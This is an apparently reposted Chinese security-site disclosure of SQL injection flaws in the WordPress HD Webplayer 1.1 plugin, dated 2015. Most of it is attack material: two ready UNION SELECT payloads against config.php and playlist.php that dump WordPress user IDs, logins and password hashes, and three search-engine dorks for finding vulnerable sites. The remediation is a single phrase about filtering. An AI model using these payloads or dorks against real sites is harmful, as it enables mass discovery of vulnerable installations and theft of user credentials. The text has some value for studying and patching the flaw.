Wordpress HD Webplayer 1.1 SQL注射及修复

Wordpress HD Webplayer 1.1 SQL注射及修复 - 网站安全

来源：自学PHP网时间：2015-04-17 11:59 作者：阅读:次

[导读] 标题 Wordpress HD Webplayer 1.1 SQL Injection作者: JoinSe7en程序官网: http://www.hdwebplayer.com/软件连接: http://hdwebplayer.com/downloads/hdwebplayer_wordpress_1.1.zip影响版本: version......

标题 Wordpress HD Webplayer 1.1 SQL Injection
作者: JoinSe7en
程序官网: http://www.hdwebplayer.com/
软件连接: http://hdwebplayer.com/downloads/hdwebplayer_wordpress_1.1.zip
影响版本: version 1.1
已测试系统: Windows 7, Backtrack 5 r3

+----------------------------------------------------------------------+
| 缺陷1 - config.php |
+----------------------------------------------------------------------+

# Location:

http://www.2cto.com /wp-content/plugins/hd-webplayer/config.php?id= [INJECT HERE]

# Exploit Code:

config.php?id=1+/*!UNION*/+/*!SELECT*/+1,2,3,group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),5,6,7+from+wp_users //Number of columns may be different

+----------------------------------------------------------------------+
| 缺陷 2 - playlist.php |
+----------------------------------------------------------------------+

# Location:

http://www.2cto.com /wp-content/plugins/hd-webplayer/playlist.php?videoid= [INJECT HERE]

# Exploit Code:

playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),2,3,4,5,6,7+from+wp_users //Number of columns may be different

三个不同的搜索关键词:

# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"

修复：针对性过滤

创新工厂安全宝安全防护绕过漏洞 - 网站安全

顺丰综合管理平台服务器沦陷 - 网站安全 - 自学

子栏目

Wordpress HD Webplayer 1.1 SQL注射及修复 - 网站安全

最新评论

添加评论

更多文章推荐

添加评论